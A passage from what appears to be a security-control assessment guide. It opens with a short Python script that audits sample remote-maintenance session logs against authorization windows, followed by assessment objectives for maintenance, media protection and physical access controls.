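2008-06-02T09:00:00|AUTHZ|S1|vendor-svc|198.51.100.7|window=2008-06-02T09:00:00/2008-06-02T12:00:00
2008-06-02T09:12:41|OPEN|S1|vendor-svc|198.51.100.7
2008-06-02T10:05:13|CLOSE|S1|vendor-svc|198.51.100.7
2008-06-02T10:06:00|PWCHANGE|-|vendor-svc|-
2008-06-02T22:30:02|OPEN|S2|vendor-svc|203.0.113.9
2008-06-02T23:10:45|CLOSE|S2|vendor-svc|203.0.113.9
2008-06-03T08:00:00|AUTHZ|S3|vendor-svc|198.51.100.7|window=2008-06-03T08:00:00/2008-06-03T10:00:00
2008-06-03T08:20:00|OPEN|S3|vendor-svc|198.51.100.7
"""


@dataclass
class Session:
    user: str
    src_ip: str
    opened: Optional[datetime] = None
    closed: Optional[datetime] = None


Authorization = Tuple[str, str, datetime, datetime]  # user, source ip, window start, window end


def parse_log(text: str):
    """Split the records into authorizations, sessions and password-change events."""
    authz: Dict[str, Authorization] = {}
    sessions: Dict[str, Session] = {}
    pw_changes: Dict[str, List[datetime]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("|")
        ts = datetime.strptime(fields[0], TS)
        event, sid, user, ip = fields[1:5]
        if event == "AUTHZ":
            window = fields[5].split("=", 1)[1]
            start, end = (datetime.strptime(t, TS) for t in window.split("/"))
            authz[sid] = (user, ip, start, end)
        elif event == "OPEN":
            sessions[sid] = Session(user, ip, opened=ts)
        elif event == "CLOSE":
            sessions.setdefault(sid, Session(user, ip)).closed = ts
        elif event == "PWCHANGE":
            pw_changes.setdefault(user, []).append(ts)
    return authz, sessions, pw_changes


def review_remote_maintenance(text: str) -> Dict[str, List[str]]:
    """Return, per session, the list of MA-4 conditions it fails (empty list = clean)."""
    authz, sessions, pw_changes = parse_log(text)
    findings: Dict[str, List[str]] = {}
    for sid, s in sessions.items():
        issues: List[str] = []
        auth = authz.get(sid)
        if auth is None:
            issues.append("no authorization record for session")
        else:
            user, ip, start, end = auth
            if (s.user, s.src_ip) != (user, ip):
                issues.append("user/source does not match authorization")
            if s.opened is not None and not (start <= s.opened <= end):
                issues.append("opened outside authorized window")
            if s.closed is not None and s.closed > end:
                issues.append("still connected after authorized window")
        if s.closed is None:
            issues.append("no CLOSE record: remote disconnect not verified")
        elif not any(t >= s.closed for t in pw_changes.get(s.user, [])):
            issues.append("password not changed after session ended")
        findings[sid] = issues
    return findings


if __name__ == "__main__":
    for sid, issues in review_remote_maintenance(SAMPLE_LOG).items():
        print(sid, "OK" if not issues else "; ".join(issues))
```

Run against the constructed records, S1 passes, S2 is flagged for lacking an authorization and a subsequent password change, and S3 is flagged because no disconnect was ever recorded. The same review, fed from the organization's real session and authentication logs, is the evidence an assessor would expect to see behind the "maintenance records" and "audit records" listed under MA-4(1).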
MA-4(2) REMOTE MAINTENANCE
Control Enhancement:
The organization addresses the installation and use of remote maintenance and diagnostic links in the security plan for the information system.
MA-4(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization addresses the installation and use of remote maintenance and diagnostic links in the security plan for the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; security plan; maintenance records; audit records; other relevant documents or records]. (M) (H)
MA-4(3) REMOTE MAINTENANCE
Control Enhancement:
The organization does not allow remote maintenance or diagnostic services to be performed by a provider that does not implement for its own information system, a level of security at least as high as that implemented on the system being serviced, unless the component being serviced is removed from the information system and sanitized (with regard to organizational information) before the service begins and also sanitized (with regard to potentially malicious software) after the service is performed and before being reconnected to the information system.
MA-4(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization does not allow remote diagnostic or maintenance services to be performed by a provider that does not implement for its own information system, a level of security at least as high as the level of security implemented on the information system being serviced, unless the component being serviced is removed from the information system and sanitized (with regard to organizational information) before the service begins and also sanitized (with regard to potentially malicious software) after the service is performed and before being reconnected to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; service provider contracts and/or service level agreements; maintenance records; audit records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities; information system maintenance provider]. (H)


ASSESSMENT PROCEDURE
MA-5 MAINTENANCE PERSONNEL
Control: The organization allows only authorized personnel to perform maintenance on the information system.
Supplemental Guidance: Maintenance personnel (whether performing maintenance locally or remotely) have appropriate access authorizations to the information system when maintenance activities allow access to organizational information or could result in a future compromise of confidentiality, integrity, or availability. When maintenance personnel do not have needed access authorizations, organizational personnel with appropriate access authorizations supervise maintenance personnel during the performance of maintenance activities on the information system.
MA-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization allows only authorized personnel to perform maintenance on the information system; and
(ii) organizational personnel with appropriate access authorizations supervise maintenance personnel who lack the needed access authorizations while those personnel perform maintenance activities on the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing maintenance personnel; service provider contracts and/or service level agreements; list of authorized personnel; maintenance records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
MA-6 TIMELY MAINTENANCE
Control: The organization obtains maintenance support and spare parts for [Assignment: organization-defined list of key information system components] within [Assignment: organization-defined time period] of failure.
Supplemental Guidance: None.
MA-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, key information system components;
(ii) the organization defines in the security plan, explicitly or by reference, the time period within which support and spare parts must be obtained after a failure; and
(iii) the organization obtains maintenance support and spare parts for the organization-defined list of key information system components within the organization-defined time period of failure.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing timely maintenance for the information system; service provider contracts and/or service level agreements; inventory and availability of spare parts; security plan; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H)


FAMILY: Media Protection

ASSESSMENT PROCEDURE
MP-1 MEDIA PROTECTION POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, media protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the media protection policy and associated media protection controls.
Supplemental Guidance: The media protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The media protection policy can be included as part of the general information security policy for the organization. Media protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
MP-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents media protection policy and procedures;
(ii) the organization disseminates media protection policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review media protection policy and procedures; and
(iv) the organization updates media protection policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Media protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (H)
MP-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the media protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the media protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the media protection procedures address all areas identified in the media protection policy and address achieving policy-compliant implementations of all associated media protection controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Media protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (H)


ASSESSMENT PROCEDURE
MP-2 MEDIA ACCESS
Control: The organization restricts access to information system media to authorized individuals.
Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, magnetic tapes, external/removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). This control also applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones).

An organizational assessment of risk guides the selection of media and associated information contained on that media requiring restricted access. Organizations document in policy and procedures, the media requiring restricted access, individuals authorized to access the media, and the specific measures taken to restrict access. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, fewer protection measures are needed for media containing information determined by the organization to be in the public domain, to be publicly releasable, or to have limited or no adverse impact on the organization or individuals if accessed by other than authorized personnel. In these situations, it is assumed that the physical access controls where the media resides provide adequate protection.

MP-2.1 ASSESSMENT OBJECTIVE:
Determine if the organization restricts access to information system media to authorized users.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media access; access control policy and procedures; physical and environmental protection policy and procedures; media storage facilities; access control records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (M) (H)
MP-2(1) MEDIA ACCESS
Control Enhancement:
The organization employs automated mechanisms to restrict access to media storage areas and to audit access attempts and access granted.
Enhancement Supplemental Guidance: This control enhancement is primarily applicable to designated media storage areas within an organization where a significant volume of media is stored and is not intended to apply to every location where some media is stored (e.g., in individual offices).
MP-2(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs automated mechanisms to restrict access to media storage areas; and
(ii) the organization employs automated mechanisms to audit access attempts and access granted.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media access; access control policy and procedures; physical and environmental protection policy and procedures; media storage facilities; access control devices; access control records; audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access restrictions to media storage areas]. (H)


ASSESSMENT PROCEDURE
MP-3 MEDIA LABELING
Control: The organization: (i) affixes external labels to removable information system media and information system output indicating the distribution limitations, handling caveats and applicable security markings (if any) of the information; and (ii) exempts [Assignment: organization-defined list of media types or hardware components] from labeling so long as they remain within [Assignment: organization-defined protected environment].
Supplemental Guidance: An organizational assessment of risk guides the selection of media requiring labeling. Organizations document in policy and procedures the media requiring labeling and the specific measures taken to afford such protection. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, labeling is not required for media containing information determined by the organization to be in the public domain or to be publicly releasable.
MP-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, its protected environment for media labeling requirements;
(ii) the organization defines in the security plan, explicitly or by reference, media types and hardware components that are exempted from external labeling requirements; and
(iii) the organization affixes external labels to removable information storage media and information system output not otherwise exempted from this labeling requirement, indicating the distribution limitations, handling caveats, and applicable security markings (if any) of the information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media labeling; physical and environmental protection policy and procedures; security plan; removable storage media and information system output; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
MP-4 MEDIA STORAGE
Control: The organization physically controls and securely stores information system media within controlled areas.
Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, magnetic tapes, external/removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). A controlled area is any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system. This control applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones). Telephone systems are also considered information systems and may have the capability to store information on internal media (e.g., on voicemail systems). Since telephone systems do not have, in most cases, the identification, authentication, and access control mechanisms typically employed in other information systems, organizational personnel exercise extreme caution in the types of information stored on telephone voicemail systems.
An organizational assessment of risk guides the selection of media and associated information contained on that media requiring physical protection. Organizations document in policy and procedures the media requiring physical protection and the specific measures taken to afford such protection. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, fewer protection measures are needed for media containing information determined by the organization to be in the public domain, to be publicly releasable, or to have limited or no adverse impact on the organization or individuals if accessed by other than authorized personnel. In these situations, it is assumed that the physical access controls to the facility where the media resides provide adequate protection. The organization protects information system media identified by the organization until the media are destroyed or sanitized using approved equipment, techniques, and procedures.
As part of a defense-in-depth protection strategy, the organization considers routinely encrypting information at rest on selected secondary storage devices. FIPS 199 security categorization guides the selection of appropriate candidates for secondary storage encryption. The organization implements effective cryptographic key management in support of secondary storage encryption and provides protections to maintain the availability of the information in the event of the loss of cryptographic keys by users. NIST Special Publications 800-56 and 800-57 provide guidance on cryptographic key establishment and cryptographic key management. Related security controls: CP-9, RA-2.
MP-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization selects and documents the media and associated information contained on that media requiring physical protection in accordance with an organizational assessment of risk;
(ii) the organization defines the specific measures used to protect the selected media and information contained on that media;
(iii) the organization physically controls and securely stores information system media within controlled areas; and
(iv) the organization protects information system media commensurate with the FIPS 199 security categorization of the information contained on the media.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media storage; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
MP-5 MEDIA TRANSPORT
Control: The organization protects and controls information system media during transport outside of controlled areas and restricts the activities associated with transport of such media to authorized personnel.
Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, tapes, removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). A controlled area is any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system. This control also applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones) that are transported outside of controlled areas. Telephone systems are also considered information systems and may have the capability to store information on internal media (e.g., on voicemail systems). Since telephone systems do not have, in most cases, the identification, authentication, and access control mechanisms typically employed in other information systems, organizational personnel exercise extreme caution in the types of information stored on telephone voicemail systems that are transported outside of controlled areas. An organizational assessment of risk guides the selection of media and associated information contained on that media requiring protection during transport. Organizations document in policy and procedures the media requiring protection during transport and the specific measures taken to protect such transported media. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. An organizational assessment of risk also guides the selection and use of appropriate storage containers for transporting non-digital media. Authorized transport and courier personnel may include individuals from outside the organization (e.g., U.S. Postal Service or a commercial transport or delivery service).
MP-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies personnel authorized to transport information system media outside of controlled areas;
(ii) the organization documents, in policy and procedures, the media requiring protection during transport and the specific measures taken to protect such transported media;
(iii) the organization protects and controls information system media during transport outside of controlled areas; and
(iv) the organization restricts the activities associated with transport of information system media to authorized personnel.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; list of organization-defined personnel authorized to transport information system media outside of controlled areas; information system media; information system media transport records; information system audit records; other relevant documents or records]. (M) (H)
MP-5(1) MEDIA TRANSPORT
Control Enhancement:
The organization protects digital and non-digital media during transport outside of controlled areas using [Assignment: organization-defined security measures, e.g., locked container, cryptography].
Enhancement Supplemental Guidance: Physical and technical security measures for the protection of digital and non-digital media are approved by the organization, commensurate with the FIPS 199 security categorization of the information residing on the media, and consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. Cryptographic mechanisms can provide confidentiality and/or integrity protections depending upon the mechanisms used.
MP-5(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, security measures (e.g., locked container, cryptography) for information system media transported outside of controlled areas; and
(ii) the organization protects digital and non-digital media during transport outside of controlled areas using the organization-defined security measures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media transport records; audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system media transport responsibilities]. (H)
MP-5(2) MEDIA TRANSPORT
Control Enhancement:
The organization documents, where appropriate, activities associated with the transport of information system media using [Assignment: organization-defined system of records].
Enhancement Supplemental Guidance: Organizations establish documentation requirements for activities associated with the transport of information system media in accordance with the organizational assessment of risk.
MP-5(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, a system of records for documenting activities associated with the transport of information system media; and
(ii) the organization documents, where appropriate, activities associated with the transport of information system media using the organization-defined system of records.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media transport records; audit records; other relevant documents or records]. (M) (H)
MP-5(3) MEDIA TRANSPORT
Control Enhancement:
The organization employs an identified custodian at all times to transport information system media.
Enhancement Supplemental Guidance: Organizations establish documentation requirements for activities associated with the transport of information system media in accordance with the organizational assessment of risk.
MP-5(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs an identified custodian at all times to transport information system media.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; information system media transport records; audit records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system media transport responsibilities]. (H)


ASSESSMENT PROCEDURE
MP-6 MEDIA SANITIZATION AND DISPOSAL
Control: The organization sanitizes information system media, both digital and non-digital, prior to disposal or release for reuse.
Supplemental Guidance: Sanitization is the process used to remove information from information system media such that there is reasonable assurance, in proportion to the confidentiality of the information, that the information cannot be retrieved or reconstructed. Sanitization techniques, including clearing, purging, and destroying media information, prevent the disclosure of organizational information to unauthorized individuals when such media is reused or disposed of. The organization uses its discretion on sanitization techniques and procedures for media containing information deemed to be in the public domain or publicly releasable, or deemed to have no adverse impact on the organization or individuals if released for reuse or disposed of. NIST Special Publication 800-88 provides guidance on media sanitization. The National Security Agency also provides media sanitization guidance and maintains a listing of approved sanitization products at http://www.nsa.gov/ia/government/mdg.cfm.
MP-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies information system media requiring sanitization and the appropriate sanitization techniques and procedures to be used in the process;
(ii) the organization sanitizes identified information system media, both paper and digital, prior to disposal or release for reuse; and
(iii) information system media sanitization is consistent with NIST Special Publication 800-88.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media sanitization and disposal; NIST Special Publication 800-88; media sanitization records; audit records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (M) (H)
MP-6(1) MEDIA SANITIZATION AND DISPOSAL
Control Enhancement:
The organization tracks, documents, and verifies media sanitization and disposal actions.
MP-6(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization tracks, documents, and verifies media sanitization and disposal actions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy and procedures; media sanitization records; audit records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (H)
MP-6(2) MEDIA SANITIZATION AND DISPOSAL
Control Enhancement:
The organization periodically tests sanitization equipment and procedures to verify correct performance.
MP-6(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization periodically tests sanitization equipment and procedures to verify correct performance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system media protection policy; procedures addressing media sanitization and disposal; media sanitization equipment test records; information system audit records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (H)


FAMILY: Physical and Environmental Protection


ASSESSMENT PROCEDURE
PE-1 PHYSICAL AND ENVIRONMENTAL PROTECTION POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, physical and environmental protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the physical and environmental protection policy and associated physical and environmental protection controls.
Supplemental Guidance: The physical and environmental protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The physical and environmental protection policy can be included as part of the general information security policy for the organization. Physical and environmental protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
PE-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents physical and environmental protection policy and procedures;
(ii) the organization disseminates physical and environmental protection policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review physical and environmental protection policy and procedures; and
(iv) the organization updates physical and environmental protection policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with physical and environmental protection responsibilities]. (H)
PE-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the physical and environmental protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the physical and environmental protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the physical and environmental protection procedures address all areas identified in the physical and environmental protection policy and address achieving policy-compliant implementations of all associated physical and environmental protection controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with physical and environmental protection responsibilities]. (H)


ASSESSMENT PROCEDURE
PE-2 PHYSICAL ACCESS AUTHORIZATIONS
Control: The organization develops and keeps current a list of personnel with authorized access to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) and issues appropriate authorization credentials. Designated officials within the organization review and approve the access list and authorization credentials [Assignment: organization-defined frequency, at least annually].
Supplemental Guidance: Appropriate authorization credentials include, for example, badges, identification cards, and smart cards. The organization promptly removes from the access list personnel no longer requiring access to the facility where the information system resides.
PE-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies areas within the facility that are publicly accessible;
(ii) the organization defines in the security plan, explicitly or by reference, the frequency of review and approval for the physical access list and authorization credentials for the facility and the frequency is at least annually;
(iii) the organization develops and keeps current lists of personnel with authorized access to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible);
(iv) the organization issues appropriate authorization credentials (e.g., badges, identification cards, smart cards); and
(v) designated officials within the organization review and approve the access list and authorization credentials in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access authorizations; authorized personnel access list; authorization credentials; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PE-3 PHYSICAL ACCESS CONTROL
Control: The organization controls all physical access points (including designated entry/exit points) to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) and verifies individual access authorizations before granting access to the facility. The organization controls access to areas officially designated as publicly accessible, as appropriate, in accordance with the organization's assessment of risk.
Supplemental Guidance: The organization uses physical access devices (e.g., keys, locks, combinations, card readers) and/or guards to control entry to facilities containing information systems. The organization secures keys, combinations, and other access devices and inventories those devices regularly. The organization changes combinations and keys: (i) periodically; and (ii) when keys are lost, combinations are compromised, or individuals are transferred or terminated. Workstations and associated peripherals connected to (and part of) an organizational information system may be located in areas designated as publicly accessible with access to such devices being appropriately controlled. Where a federal Personal Identity Verification (PIV) credential is used as an identification token and token-based access control is employed, the access control system conforms to the requirements of FIPS 201 and NIST Special Publication 800-73. If the token-based access control function employs cryptographic verification, the access control system conforms to the requirements of NIST Special Publication 800-78. If the token-based access control function employs biometric verification, the access control system conforms to the requirements of NIST Special Publication 800-76.
PE-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization controls all physical access points (including designated entry/exit points) to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible);
(ii) the organization verifies individual access authorizations before granting access to the facility; and
(iii) the organization also controls access to areas officially designated as publicly accessible, as appropriate, in accordance with the organization's assessment of risk.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with physical access control responsibilities]. (M) (H)
Test: [SELECT FROM: Physical access control capability]. (M) (H)
PE-3.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization uses physical access devices (e.g., keys, locks, combinations, card readers) and/or guards to control entry to facilities containing information systems;
(ii) the organization secures and regularly inventories keys, combinations, and other access devices; and
(iii) the organization changes combinations and keys periodically, and when keys are lost, combinations are compromised, or individuals are transferred or terminated.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; maintenance records; records of key and lock combination changes; storage locations for keys and access devices; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Physical access control devices]. (M) (H)
PE-3.3 ASSESSMENT OBJECTIVE:
Determine if:
(i) the access control system is consistent with FIPS 201 and NIST Special Publication 800-73 (where the federal Personal Identity Verification (PIV) credential is used as an identification token and token-based access control is employed);
(ii) the access control system is consistent with NIST Special Publication 800-78 (where the token-based access control function employs cryptographic verification); and
(iii) the access control system is consistent with NIST Special Publication 800-76 (where the token-based access control function employs biometric verification).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; FIPS 201; NIST Special Publications 800-73, 800-76, and 800-78; information system design documentation; other relevant documents or records]. (L) (M) (H)
PE-3(1) PHYSICAL ACCESS CONTROL
Control Enhancement:
The organization controls physical access to the information system independent of the physical access controls for the facility.
Enhancement Supplemental Guidance: This control enhancement, in general, applies to server rooms, communications centers, or any other areas within a facility containing large concentrations of information system components or components with a higher impact level than that of the majority of the facility. The intent is to provide an additional layer of physical security for those areas where the organization may be more vulnerable due to the concentration of information system components or the impact level of the components. The control enhancement is not intended to apply to workstations or peripheral devices that are typically dispersed throughout the facility and used routinely by organizational personnel.
PE-3(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies specific areas within the facility that, due to the concentration of information system components or the impact level of the components, require additional physical protections over those afforded to the facility as a whole; and
(ii) for an information system identified as requiring additional physical protection or part of a large concentration of information system components, the organization controls physical access to the system independent of the physical access controls for the facility.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; information system entry and exit points; list of areas within the facility containing high concentrations of information system components or information system components requiring additional physical protection; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
PE-4 ACCESS CONTROL FOR TRANSMISSION MEDIUM
Control: The organization controls physical access to information system distribution and transmission lines within organizational facilities.
Supplemental Guidance: Physical protections applied to information system distribution and transmission lines help prevent accidental damage, disruption, and physical tampering. Additionally, physical protections are necessary to help prevent eavesdropping or in-transit modification of unencrypted transmissions. Protective measures to control physical access to information system distribution and transmission lines include: (i) locked wiring closets; (ii) disconnected or locked spare jacks; and/or (iii) protection of cabling by conduit or cable trays.
PE-4.1 ASSESSMENT OBJECTIVE:
Determine if the organization controls physical access to information system distribution and transmission lines within organizational facilities.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing access control for transmission medium; information system design documentation; facility communications and wiring diagrams; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
PE-5 ACCESS CONTROL FOR DISPLAY MEDIUM
Control: The organization controls physical access to information system devices that display information to prevent unauthorized individuals from observing the display output.
Supplemental Guidance: None.
PE-5.1 ASSESSMENT OBJECTIVE:
Determine if the organization controls physical access to information system devices that display information to prevent unauthorized individuals from observing the display output.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing access control for display medium; facility layout of information system components; actual displays from information system components; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
PE-6 MONITORING PHYSICAL ACCESS
Control: The organization monitors physical access to the information system to detect and respond to physical security incidents.
Supplemental Guidance: The organization reviews physical access logs periodically and investigates apparent security violations or suspicious physical access activities. Response to detected physical security incidents is part of the organization's incident response capability.
PE-6.1 ASSESSMENT OBJECTIVE:
Determine if the organization monitors physical access to the information system to detect and respond to physical security incidents.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; physical access logs or records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with physical access monitoring responsibilities]. (M) (H)
Test: [SELECT FROM: Physical access monitoring capability]. (M) (H)
PE-6(1) MONITORING PHYSICAL ACCESS
Control Enhancement:
The organization monitors real-time physical intrusion alarms and surveillance equipment.
PE-6(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization monitors real-time intrusion alarms and surveillance equipment.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; intrusion alarm/surveillance equipment logs or records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with physical access monitoring responsibilities]. (H)
Test: [SELECT FROM: Physical access monitoring capability]. (H)
PE-6(2) MONITORING PHYSICAL ACCESS
Control Enhancement:
The organization employs automated mechanisms to recognize potential intrusions and initiate appropriate response actions.
PE-6(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to recognize potential intrusions and initiate appropriate response actions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; information system design documentation; other relevant documents or records]. (H)
